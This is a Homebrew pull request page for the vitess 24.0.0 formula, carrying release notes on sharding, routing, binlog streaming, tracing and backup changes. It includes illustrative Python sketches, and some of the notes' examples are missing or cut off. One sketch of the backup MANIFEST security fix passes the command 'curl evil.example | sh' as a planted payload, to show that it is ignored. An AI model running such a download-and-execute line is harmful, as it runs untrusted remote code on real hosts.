vitess 24.0.0#280223
Merged
chenrui333
approved these changes
Apr 30, 2026
Contributor
🤖 An automated task has requested bottles to be published to this PR. Caution: Please do not push to this PR branch before the bottle commits have been pushed, as this results in a state that is difficult to recover from. If you need to resolve a merge conflict, please use a merge commit. Do not force-push to this PR branch.
Created by brew bump
Created with brew bump-formula-pr.
Release notes
Major Changes
New Support
Window function pushdown for sharded keyspaces
This release introduces an optimization that allows window functions to be pushed down to individual shards when they are partitioned by a column that matches a unique vindex.
Previously, all window function queries required single-shard routing, which limited their applicability on sharded tables. With this change, queries where the PARTITION BY clause aligns with a unique vindex can now be pushed down and executed on each shard.
For examples and more details, see the documentation.
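To illustrate why alignment with a unique vindex makes pushdown safe, here is a minimal Python sketch (not Vitess code). It assumes a hypothetical two-shard layout where rows are placed by customer_id, so every row of a given partition lives on exactly one shard. The rows, the column names, and the shard_for function are all illustrative assumptions.

```python
from collections import defaultdict

# Hypothetical rows: (customer_id, amount). customer_id stands in for a
# column backed by a unique vindex; this is an illustration, not Vitess code.
ROWS = [(1, 50), (2, 20), (1, 30), (3, 70), (2, 90), (3, 10)]
NUM_SHARDS = 2


def shard_for(customer_id):
    """Toy placement function standing in for a vindex lookup."""
    return customer_id % NUM_SHARDS


def row_number_by_partition(rows):
    """Emulate ROW_NUMBER() OVER (PARTITION BY customer_id ORDER BY amount)."""
    partitions = defaultdict(list)
    for customer_id, amount in rows:
        partitions[customer_id].append(amount)
    result = set()
    for customer_id, amounts in partitions.items():
        for position, amount in enumerate(sorted(amounts), start=1):
            result.add((customer_id, amount, position))
    return result


def pushed_down(rows):
    """Run the window function on each shard, then combine the results."""
    shards = defaultdict(list)
    for row in rows:
        shards[shard_for(row[0])].append(row)
    combined = set()
    for shard_rows in shards.values():
        combined |= row_number_by_partition(shard_rows)
    return combined


# Each partition lives on exactly one shard, so both plans agree.
print(pushed_down(ROWS) == row_number_by_partition(ROWS))
```

If the partition column did not determine the shard, rows of one partition could be split across shards and the per-shard row numbers would no longer match the global ones.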
View Routing Rules
Vitess now supports routing rules for views, which can be applied in the same way as table routing rules with vtctldclient ApplyRoutingRules. When a view routing rule is active, VTGate rewrites queries that reference the source view to use the target view's definition instead. For example, given this routing rule:
{
  "rules": [
    {
      "from_table": "source_ks.my_view",
      "to_tables": ["target_ks.my_view"]
    }
  ]
}
And this view definition:
A query like SELECT * FROM source_ks.my_view would be internally rewritten to:
View routing rules require the schema tracker to monitor views, which means VTGate must be started with the --enable-views flag and VTTablet with the --queryserver-enable-views flag. The target view must exist in the specified keyspace for the routing rule to function correctly. For more details, see the Schema Routing Rules documentation.
Tablet targeting via USE statement
VTGate now supports routing queries to a specific tablet by alias using an extended USE statement syntax:
For example, to target a specific replica tablet:
Once set, all subsequent queries in the session route to the specified tablet until cleared with a standard USE keyspace or USE keyspace@tablet_type statement. This is useful for debugging, per-tablet monitoring, cache warming, and other operational tasks where targeting a specific tablet is required.
Note: A shard must be specified when using tablet targeting. Like shard targeting, this bypasses vindex-based routing, so use with care.
Binlog Streaming Support
VTGate now supports GTID-based binlog streaming through two protocols:
COM_BINLOG_DUMP_GTID replication protocol command: no special VStream-aware adapters or direct MySQL access required.
BinlogDumpGTID streaming RPC in vtgateservice: provides native gRPC access for custom clients without the MySQL protocol dependency.
Note: Only GTID-based streaming is supported. File/position-based streaming is not available through either COM_BINLOG_DUMP or COM_BINLOG_DUMP_GTID and returns an error.
This feature is disabled by default. Enable it with --enable-binlog-dump.
New flags:
--enable-binlog-dump: Enables binlog dump support. Without this flag, binlog dump requests return an error.
--binlog-dump-authorized-users: Comma-separated list of users authorized to execute binlog dump operations, or % to allow all users.
Requirements:
When initiating a binlog dump connection, clients must specify:
filepos) of 4
For gRPC clients, specify the keyspace, shard, and optionally the tablet type or tablet alias directly in the BinlogDumpGTIDRequest.
Limitations:
MoveTables or Reshard operations. Use the VStream API for those use cases.
Structured logging
Vitess now uses structured JSON logging by default. Log output is emitted as JSON to stderr. To configure the minimum log level, pass --log-level (one of debug, info, warn, error; default info). For a human-readable format with automatic color detection, pass --log-format=text. To revert to the previous glog backend, pass --log-structured=false.
glog is deprecated as of v24 and will be removed in v25.
Breaking Changes
External Decompressor No Longer Read from Backup MANIFEST by Default
The external decompressor command stored in a backup's MANIFEST file is no longer used at restore time by default. Previously, when no --external-decompressor flag was provided, VTTablet would fall back to the command specified in the MANIFEST. This posed a security risk: an attacker with write access to backup storage could modify the MANIFEST to execute arbitrary commands on the tablet.
Starting in v24, the MANIFEST-based decompressor is ignored unless you explicitly opt in with the new --external-decompressor-use-manifest flag. If you rely on this behavior, add the flag to your VTTablet configuration, but be aware of the security implications.
See #19460 for details.
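The decision described above can be modeled as a small function. This is a hedged Python sketch, not the VTTablet implementation: the function name and parameters are hypothetical, and it assumes that an explicit --external-decompressor value still takes precedence when the opt-in flag is set.

```python
def choose_decompressor(flag_cmd, manifest_cmd, use_manifest=False):
    """Return the external decompressor command to run, or None.

    flag_cmd     -- value of --external-decompressor ("" or None if unset)
    manifest_cmd -- command recorded in the backup MANIFEST, if any
    use_manifest -- models --external-decompressor-use-manifest (v24 opt-in)
    """
    if flag_cmd:
        # An operator-supplied command is trusted configuration.
        return flag_cmd
    if use_manifest and manifest_cmd:
        # Only honored on explicit opt-in, because the MANIFEST lives in
        # backup storage and may be writable by an attacker.
        return manifest_cmd
    # Default in this model: ignore the MANIFEST command entirely.
    return None


# With default settings, a command planted in the MANIFEST is not used.
print(choose_decompressor("", "curl evil.example | sh"))
```

What a tablet does when no external command is selected is outside the scope of this sketch.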
Minor Changes
VReplication
--shards flag for MoveTables/Reshard start and stop
The start and stop commands for MoveTables and Reshard workflows now support the --shards flag, allowing users to start or stop workflows on a specific subset of shards rather than all shards at once.
Example usage:
Automatic tablet retry for tablet-specific errors
VReplication workflows now automatically retry with different tablets when encountering tablet-specific errors. Previously, workflows without a cell preference would default to the local cell and could get stuck retrying the same failing tablet indefinitely.
When a tablet encounters errors like binary log purging (MySQL error 1236 or 1789) or GTID set mismatches, VReplication adds that tablet to an ignore list and tries other tablets across all cells. Once all matching tablets have been tried, the ignore list is cleared and the workflow retries from scratch.
This is particularly useful in multi-cell deployments where a tablet in the local cell may lack the required binary logs, but tablets in other cells still have them.
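The ignore-list behavior can be sketched roughly as follows. This is a simplified Python model, not VReplication's tablet picker: the TabletPicker class, its method names, and the tablet aliases are hypothetical, and real selection also considers cells and tablet types.

```python
class TabletPicker:
    """Toy model of retrying across tablets with an ignore list."""

    def __init__(self, candidates):
        if not candidates:
            raise ValueError("at least one candidate tablet is required")
        self.candidates = list(candidates)
        self.ignored = set()

    def pick(self):
        """Return the first candidate that is not on the ignore list."""
        available = [t for t in self.candidates if t not in self.ignored]
        if not available:
            # Every matching tablet has been tried: clear the list and
            # start again from scratch.
            self.ignored.clear()
            available = list(self.candidates)
        return available[0]

    def report_tablet_error(self, alias):
        """Record a tablet-specific failure, e.g. purged binary logs."""
        self.ignored.add(alias)


picker = TabletPicker(["zone1-100", "zone2-200"])
first = picker.pick()              # local-cell tablet is tried first
picker.report_tablet_error(first)  # it lacks the required binary logs
print(picker.pick())               # the workflow moves on to another cell
```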
VTGate
Removed --grpc-send-session-in-streaming flag
The VTGate flag --grpc-send-session-in-streaming has been removed. This flag was deprecated in v22 via #17907 and defaulted to true.
The session is now always sent as the last packet in the streaming response for StreamExecute and StreamExecuteMulti RPCs. This behavior is required to support transactions in streaming and cannot be disabled.
Impact: Remove any usage of the --grpc-send-session-in-streaming flag from VTGate startup scripts or configuration.
New default for --legacy-replication-lag-algorithm flag
The VTGate flag --legacy-replication-lag-algorithm now defaults to false, disabling the legacy approach to handling replication lag by default.
Instead, a simpler algorithm based purely on low lag, high lag, and a minimum number of tablets is used, which has proven to be more stable in many production environments. The two approaches are explained in detail in this code comment.
In v25 this flag will be deprecated, and in the following release it will be removed. In the meantime, the legacy behaviour can be used by setting --legacy-replication-lag-algorithm=true. This deprecation is tracked in vitessio/vitess#18914.
New "session" mode for --vtgate-balancer-mode flag
The VTGate flag --vtgate-balancer-mode now supports a new "session" mode in addition to the existing "cell", "prefer-cell", and "random" modes. Session mode routes each session consistently to the same tablet for the session's duration.
To enable session mode, set the flag when starting VTGate:
Query Serving
JSON_EXTRACT now supports dynamic path arguments
The JSON_EXTRACT function now supports dynamic path arguments like bind variables or results from other function calls. Previously, JSON_EXTRACT only worked with static string literals for path arguments.
NULL handling now matches MySQL behavior. The function returns NULL when either the document or path argument is NULL.
Static path arguments are still optimized, even when mixed with dynamic arguments, so existing queries won't see any performance regression.
VTTablet
New Experimental flag --init-tablet-type-lookup
The new experimental flag --init-tablet-type-lookup for VTTablet allows tablets to automatically restore their previous tablet type on restart by looking up the existing topology record, rather than always using the static --init-tablet-type value.
When enabled, the tablet uses its alias to look up the tablet type from the existing topology record on restart. This allows tablets to maintain their changed roles (e.g., RDONLY/DRAINED) across restarts without manual reconfiguration. If disabled or if no topology record exists, the standard --init-tablet-type value will be used instead.
Note: Vitess Operator-managed deployments generally do not keep matching tablet records in the topo across pod replacements, so this feature will have a more limited effect in those environments.
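The fallback rule can be summarized in a few lines. The following Python sketch is only a model of the behavior described above: the function name, its parameters, and the dictionary shape of the topology record are hypothetical, and it ignores any special cases the real implementation may have.

```python
def initial_tablet_type(init_tablet_type, lookup_enabled, topo_record):
    """Pick the tablet type to start with.

    init_tablet_type -- static value of --init-tablet-type
    lookup_enabled   -- models --init-tablet-type-lookup
    topo_record      -- existing topology record for this alias (a dict
                        with a "type" key in this sketch), or None
    """
    if lookup_enabled and topo_record is not None:
        # Restore the role the tablet had before the restart.
        return topo_record["type"]
    # Lookup disabled, or no record to restore from.
    return init_tablet_type


# A tablet that was changed to DRAINED keeps that role after a restart.
print(initial_tablet_type("REPLICA", True, {"type": "DRAINED"}))
```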
QueryThrottler Observability Metrics
VTTablet now exposes new metrics to track QueryThrottler behavior.
Four new metrics have been added:
All metrics include labels for Strategy, Workload, and Priority. The QueryThrottlerThrottled metric has additional labels for MetricName, MetricValue, and DryRun to identify which metric triggered the throttling and whether it occurred in dry-run mode.
These metrics help monitor throttling patterns, identify which workloads are throttled, measure performance overhead, and validate behavior in dry-run mode before configuration changes.
QueryThrottler Event-Driven Configuration Updates
QueryThrottler configuration is now propagated to and stored in the SrvKeyspace record within the topology server and managed using standard topology tools. Previously, tablets polled for configuration changes every 60 seconds. Tablets now use event-driven watches (WatchSrvKeyspace) to receive updates immediately when the query throttling configuration changes. All tablets in a keyspace see configuration changes at roughly the same time, and topology server changes are versioned and auditable.
This change replaces the previous file-based configuration loader with a protobuf-defined configuration structure stored in the topology. The new configuration includes fields for enabling/disabling throttling, selecting the throttling strategy, and configuring strategy-specific rules.
Tablet Connection Pool Waiter Cap
VTTablet now allows users to set a limit on the number of requests waiting to get a connection from the connection pool, for the query, stream, and transaction connection pools. The limits are set with the following flags:
--queryserver-config-query-pool-waiter-cap
--queryserver-config-stream-pool-waiter-cap
--queryserver-config-txpool-waiter-cap
All of the above have a default value of 0, meaning no limit, thus preserving the behavior of the previous version.
Tracing
OpenTelemetry tracing support
Vitess now supports OpenTelemetry as a tracing backend. To use it, set --tracer opentelemetry on any Vitess binary. Traces are exported via OTLP/gRPC, configurable with the following flags:
--otel-endpoint: OpenTelemetry collector endpoint. If empty, the OTEL_EXPORTER_OTLP_ENDPOINT env var is used; if that is also unset, the OTel SDK defaults to localhost:4317.
--otel-insecure (default false): use insecure connection to the collector.
--tracing-sampling-rate (default 0.1): sampling rate for traces (shared across all tracing backends).
Any OTLP-compatible backend (Jaeger v1.35+, Grafana Tempo, Datadog Agent, etc.) can receive these traces.
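The endpoint precedence described for --otel-endpoint (flag, then environment variable, then SDK default) can be expressed as a short function. This Python sketch only models the lookup order stated above; the function name and the injectable environ parameter are assumptions made for illustration.

```python
import os

DEFAULT_OTLP_ENDPOINT = "localhost:4317"  # OTel SDK default per the notes


def resolve_otel_endpoint(flag_value, environ=None):
    """Return the collector endpoint using flag > env var > default."""
    environ = os.environ if environ is None else environ
    if flag_value:
        # An explicit --otel-endpoint always wins.
        return flag_value
    env_value = environ.get("OTEL_EXPORTER_OTLP_ENDPOINT")
    if env_value:
        return env_value
    return DEFAULT_OTLP_ENDPOINT


# No flag and an empty environment fall through to the default.
print(resolve_otel_endpoint("", environ={}))
```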
Deprecation of OpenTracing-based tracing backends
The following tracing backends are deprecated as of v24 and will be removed in v25:
opentracing-jaeger: Uses the Jaeger client-go library, which has been archived. The Jaeger project recommends migrating to OpenTelemetry. Users should migrate to --tracer opentelemetry with an OTLP-compatible Jaeger endpoint (v1.35+).
opentracing-datadog: Uses the OpenTracing bridge in dd-trace-go. Users should migrate to --tracer opentelemetry with the Datadog Agent's OTLP ingestion endpoint.
The --tracer opentracing-jaeger and --tracer opentracing-datadog options continue to work in v24 but will log a deprecation warning at startup. The following Jaeger-specific flags are also deprecated and will be removed in v25:
--jaeger-agent-host
--tracing-sampling-type
Migration: Replace --tracer opentracing-jaeger with --tracer opentelemetry and --jaeger-agent-host host:port with --otel-endpoint host:4317. Ensure your Jaeger deployment accepts OTLP (Jaeger v1.35+ listens on port 4317 by default).
VTOrc
New --cell Flag
VTOrc now supports a --cell flag that specifies which Vitess cell the VTOrc process is running in. The flag is optional in v24 but will be required in v25+, similar to VTGate's --cell flag.
When provided, VTOrc validates that the cell exists in the topology service on startup. Without the flag, VTOrc logs a warning about the v25+ flag requirement.
This enables future cross-cell problem validation, where VTOrc will be able to ask another cell to validate detected problems before taking recovery actions. The flag is currently validated but not yet used in VTOrc recovery logic.
Note: If you're running VTOrc in a multi-cell deployment, start using the --cell flag now to prepare for the v25 requirement.
Ordered Recovery Execution and Semi-Sync Rollout
VTOrc now executes recoveries per-shard with a defined ordering, rather than per-tablet in isolation. Problems that have ordering dependencies (e.g., semi-sync configuration) are executed serially first, while independent problems are executed concurrently. This ensures that dependent recoveries happen in the correct sequence within a shard.
The main user-facing improvement is for semi-sync rollouts: VTOrc now ensures replicas have semi-sync enabled before updating the primary. Previously, enabling semi-sync on the primary before enough replicas were ready could stall writes while the primary waited for semi-sync acknowledgements that no replica was prepared to send.
See #19427 for details.
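The two-phase execution described above can be sketched as follows. This is a minimal Python illustration under stated assumptions, not VTOrc's scheduler: the run_shard_recoveries function and the example recovery names are hypothetical, and each recovery is modeled as a plain callable.

```python
from concurrent.futures import ThreadPoolExecutor


def run_shard_recoveries(ordered, independent):
    """Run recoveries for one shard.

    ordered     -- callables with ordering dependencies, run one by one
    independent -- callables with no dependencies, run concurrently
    """
    results = []
    # Phase 1: dependent recoveries run serially, in the given order.
    for recover in ordered:
        results.append(recover())
    # Phase 2: independent recoveries run concurrently.
    with ThreadPoolExecutor() as pool:
        futures = [pool.submit(recover) for recover in independent]
        results.extend(future.result() for future in futures)
    return results


def enable_semi_sync_on_replicas():
    return "replicas: semi-sync enabled"


def enable_semi_sync_on_primary():
    return "primary: semi-sync enabled"


# Replicas are updated before the primary, so the primary never waits
# for acknowledgements that no replica is prepared to send.
for line in run_shard_recoveries(
    [enable_semi_sync_on_replicas, enable_semi_sync_on_primary], []
):
    print(line)
```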
Deprecated VTOrc Metric Removed
The DiscoverInstanceTimings metric has been removed from VTOrc in v24. This metric was deprecated in v23.
Migration: Use DiscoveryInstanceTimings instead, which provides the same timing information for instance discovery actions (Backend, Instance, Other).
Impact: Monitoring dashboards or alerting systems using DiscoverInstanceTimings must be updated to use DiscoveryInstanceTimings.
Deprecation of Snapshot Topology feature
VTOrc's Snapshot Topology feature, which is enabled by setting --snapshot-topology-interval to a non-zero value, is deprecated as of v24, and the logic is planned for removal in v25.
The lack of facilities to read the snapshots created by this feature, coupled with the in-memory nature of VTOrc's backend, means this logic has limited usefulness. This deprecation is explained and tracked in detail in vitessio/vitess#18691.
Migration: Remove the VTOrc flag --snapshot-topology-interval before v25.
Impact: VTOrc can no longer create snapshots of the topology in its backend database.
Deprecated /api/replication-analysis Endpoint Removed
The /api/replication-analysis endpoint has been removed from VTOrc in v24. Use /api/detection-analysis instead, which provides the same functionality.
Migration: Update any scripts, monitoring systems, or automation that calls /api/replication-analysis to use /api/detection-analysis instead. The replacement endpoint accepts the same query parameters (keyspace, shard) and returns the same JSON response format.
Impact: HTTP requests to /api/replication-analysis will return a 404 Not Found error.
Metrics
Extended Go Runtime Metrics via Prometheus
Vitess now exposes the full set of Go runtime metrics via Prometheus. The default Prometheus GoCollector only exposes three runtime/metrics (/gc/gogc:percent, /gc/gomemlimit:bytes, /sched/gomaxprocs:threads) plus the legacy go_memstats_* set. Starting in v24, all Vitess components expose approximately 150 additional metrics from Go's runtime/metrics package.
New metrics include:
A new go_info_ext gauge is also added with compiler, GOARCH, and GOOS labels, providing extended build environment information beyond the standard go_info metric.
Affected components: vtgate, vttablet, vtctld, vtorc, vtbackup, mysqlctld
No configuration required: the metrics appear automatically on the /metrics endpoint for all components using the Prometheus backend.
Backup and Restore
MySQL CLONE Support for Replica Provisioning
VTTablet and VTBackup now support using MySQL's native CLONE plugin to provision new replicas by copying data directly from a donor tablet over the network. Physical-level data copying is significantly faster than logical backup and restore, especially for large datasets. Requires MySQL 8.0.17+ and InnoDB-only tables.
New Flags:
--mysql-clone-enabled
--clone-from-primary: ... --clone-from-tablet.
--clone-from-tablet: ... zone1-123) instead of restoring from backup. Mutually exclusive with --clone-from-primary.
--restore-with-clone: ... --clone-from-primary or --clone-from-tablet.
--clone-restart-wait-timeout
Clone User Configuration:
--db-clone-user
--db-clone-password
--db-clone-use-ssl
Example Usage:
Clone from the shard's primary:
Clone from a specific tablet:
Note: All tablets participating in CLONE operations (both donors and recipients) must have --mysql-clone-enabled set during MySQL initialization to ensure the CLONE plugin is loaded and the clone user exists.
Restore Hook Improvements
Extended Hook Coverage: The vttablet_restore_done hook now fires when restores are triggered via vtctldclient RestoreFromBackup. Previously, this hook only ran during tablet startup or clone operations.
New Environment Variable: The hook now sets TM_RESTORE_DATA_BACKUP_ENGINE to indicate which backup engine was used. The value comes from the backup manifest's BackupMethod field. TM_RESTORE_DATA_BACKUP_ENGINE is only set when a restore reads from an actual backup, not for clone-based restores or when no backup is used. Hook scripts can use this to perform engine-specific actions based on whether the restore used builtin, xtrabackup, or another engine.
The entire changelog for this release can be found here.
The release includes 460 merged Pull Requests.
Thanks to all our contributors: @ChaitanyaD48, @Devanshusharma2005, @MargaretMorehead, @anujagrawal380, @aparajon, @app/dependabot, @app/promptless, @app/vitess-bot, @arthurschreiber, @c-r-dev, @chengyuan, @connorolaya, @dasl-, @dbussink, @demmer, @derekperkins, @ejortegau, @esignorelli, @farhann-saleem, @frouioui, @ghostframe, @harshit-gangal, @jdoupe, @khkim6040, @lizztheblizz, @maksimov, @mattlord, @maxenglander, @mcpherrinm, @mcrauwel, @mhamza15, @nickvanw, @pourtorabehsan, @rjlaine, @rvrangel, @sbaker617, @shlomi-noach, @siddharth16396, @stefanb, @stutibiyani, @systay, @tanjinx, @tetsuro-ohyama, @timvaillancourt, @ttran397, @twthorn, @varundeepsaini, @vitess-bot, @yushuqin
View the full release notes at https://github.com/vitessio/vitess/releases/tag/v24.0.0.